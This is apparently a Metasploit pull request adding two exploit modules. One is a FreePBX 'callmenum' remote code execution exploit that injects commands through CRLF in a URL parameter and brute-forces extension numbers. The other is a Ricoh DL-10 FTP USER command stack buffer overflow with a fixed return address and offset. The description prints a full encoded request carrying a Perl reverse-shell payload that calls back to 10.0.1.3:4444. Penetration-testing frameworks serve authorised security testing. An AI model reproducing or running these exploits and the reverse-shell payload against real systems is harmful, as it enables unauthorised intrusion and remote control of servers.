### PR TITLE
Freepbx exploit by muts

### DIFF
--- a/modules/exploits/unix/http/freepbx_callmenum.rb
+++ b/modules/exploits/unix/http/freepbx_callmenum.rb
@@ -17,6 +17,15 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Name'           => 'FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution',
 			'Description'    => %q{
 				This module exploits FreePBX version 2.10.0,2.9.0 and possibly older.
+				Due to the way callme_page.php handles the 'callmenum' parameter, it
+				is possible to inject code to the '$channel' variable in function
+				callme_startcall in order to gain remote code execution.
+
+				Please note in order to use this module properly, you must know the
+				extension number, which can be enumerated or bruteforced, or you may
+				try some of the default extensions such as 0 or 200.  Also, the call
+				has to be answered (or go to voice).
+
 				Tested on both Elastix and FreePBX ISO image installs.
 			},
 			'Author'         => [ 'muts','Martin Tschirsich' ],

--- a/modules/exploits/unix/http/freepbx_callmenum.rb
+++ b/modules/exploits/unix/http/freepbx_callmenum.rb
@@ -1,0 +1,75 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ManualRanking
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution',
+			'Description'    => %q{
+				This module exploits FreePBX version 2.10.0,2.9.0 and possibly older.
+				Tested on both Elastix and FreePBX ISO image installs.
+			},
+			'Author'         => [ 'muts','Martin Tschirsich' ],
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					[ 'URL', 'http://www.exploit-db.com/exploits/18649/' ]
+				],
+			'Platform'       => ['unix'],
+			'Arch'           => ARCH_CMD,
+			'Privileged'     => false,
+			'Payload'        =>
+				{
+					'Space'       => 1024,
+					'DisableNops' => true,
+				},
+			'Targets'        =>
+				[
+					[ 'Automatic Target', { }]
+				],
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'Mar 20 2012'))
+
+		register_options(
+			[
+				OptString.new("EXTENSION", [ true, "A range of Local extension numbers", "0-100" ]),
+			], self.class)
+	end
+
+	def exploit
+		# Check range input
+		if datastore['EXTENSION'] =~ /^(\d+)\-(\d+)$/
+			min = $1.to_i
+			max = $2.to_i
+		else
+			print_error("Please specify a range for option 'EXTENSION'")
+			return
+		end
+
+		cmd = Rex::Text.uri_encode(payload.encoded)
+
+		(min..max).each do |e|
+			connect
+			print_status("#{rhost}:#{rport} - Sending evil request with range #{e.to_s}")
+			res = send_request_raw({
+				'method' => 'GET',
+				'uri' => "/recordings/misc/callme_page.php?action=c&callmenum="+e.to_s+"@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20#{cmd}%0D%0A%0D%0A",
+				'version' => '1.0',
+				'vhost'   => rhost
+			})
+			handler
+			disconnect
+		end
+	end
+
+end

--- a/modules/exploits/windows/ftp/ricoh_dl_bof.rb
+++ b/modules/exploits/windows/ftp/ricoh_dl_bof.rb
@@ -1,0 +1,122 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = NormalRanking
+
+	include Msf::Exploit::Remote::Ftp
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'           => "Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow",
+			'Description'    => %q{
+					This module exploits a vulnerability found in Ricoh DC's DL-10 SR10 FTP
+				service.  By supplying a long string of data to the USER command, it is
+				possible to trigger a stack-based buffer overflow, which allows remote code
+				execution under the context of the user.
+
+					Please note that in order to trigger the vulnerabiity, the server must
+				be configured with a long filename (by default, it's disabled).
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'Julien Ahrens', #Discovery, PoC
+					'sinn3r'         #Metasploit
+				],
+			'References'     =>
+				[
+					['OSVDB', '79691'],
+					['URL', 'http://secunia.com/advisories/47912'],
+					['URL', 'http://www.inshell.net/2012/03/ricoh-dc-software-dl-10-ftp-server-sr10-exe-remote-buffer-overflow-vulnerability/']
+				],
+			'Payload'        =>
+				{
+					# Yup, no badchars
+					'BadChars' => "\x00",
+				},
+			'DefaultOptions'  =>
+				{
+					'ExitFunction' => "process",
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[
+						'Windows XP SP3',
+						{
+							'Ret'    => 0x77c35459,  #PUSH ESP; RETN (msvcrt.dll)
+							'Offset' => 245
+						}
+					]
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => "Mar 1 2012",
+			'DefaultTarget'  => 0))
+
+		# We're triggering the bug via the USER command, no point to have user/pass
+		# as configurable options.
+		deregister_options('FTPPASS', 'FTPUSER')
+	end
+
+	def check
+		connect
+		disconnect
+		if banner =~ /220 DSC ftpd 1\.0 FTP Server/
+			return Exploit::CheckCode::Detected
+		else
+			return Exploit::CheckCode::Safe
+		end
+	end
+
+	def exploit
+		buf = ''
+		buf << rand_text_alpha(target['Offset'], payload_badchars)
+		buf << [target.ret].pack('V')
+		buf << make_nops(20)
+		buf << payload.encoded
+
+		print_status("#{rhost}:#{rport} - Sending #{self.name}")
+		connect
+		send_user(buf)
+		handler
+		disconnect
+	end
+end
+
+=begin
+0:002> lmv m SR10
+start    end        module name
+00400000 00410000   SR10       (deferred)             
+    Image path: C:\Program Files\DC Software\SR10.exe
+    Image name: SR10.exe
+    Timestamp:        Mon May 19 23:55:32 2008 (483275E4)
+    CheckSum:         00000000
+    ImageSize:        00010000
+    File version:     1.0.0.520
+    Product version:  1.0.0.0
+    File flags:       0 (Mask 3F)
+    File OS:          4 Unknown Win32
+    File type:        1.0 App
+    File date:        00000000.00000000
+    Translations:     0409.04b0
+    CompanyName:      Ricoh Co.,Ltd.
+    ProductName:      SR-10
+    InternalName:     SR-10
+    OriginalFilename: SR10.EXE
+    ProductVersion:   1, 0, 0, 0
+    FileVersion:      1, 0, 0, 520
+    PrivateBuild:     1, 0, 0, 520
+    SpecialBuild:     1, 0, 0, 520
+    FileDescription:  SR-10
+
+
+Note: No other DC Software dlls are loaded when SR-10.exe is running, so the most
+stable component we can use is msvcrt.dll for now.
+=end

--- a/modules/exploits/windows/ftp/ricoh_dl_bof.rb
+++ b/modules/exploits/windows/ftp/ricoh_dl_bof.rb
@@ -21,8 +21,8 @@ class Metasploit3 < Msf::Exploit::Remote
 				possible to trigger a stack-based buffer overflow, which allows remote code
 				execution under the context of the user.
 
-					Please note that in order to trigger the vulnerabiity, the server must
-				be configured with a long filename (by default, it's disabled).
+					Please note that in order to trigger the vulnerability, the server must
+				be configured with a log file name (by default, it's disabled).
 			},
 			'License'        => MSF_LICENSE,
 			'Author'         =>


### PR DESCRIPTION
This is a submission by muts.

The original exploit sends a request like this (pcap):
Request sent by the original module:
GET /recordings/misc/callme_page.php?action=c&callmenum=0@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%2210.0.1.3%3a4444%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A HTTP/1.0
Host: 10.0.1.2

The modified version is programmed to allow the extension option as a range, and sends each request like this:
Request sent by the modified module:
GET /recordings/misc/callme_page.php?action=c&callmenum=0@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%2210.0.1.3%3a4444%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A HTTP/1.0
Host: 10.0.1.2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

All modifications were suggested by HD.
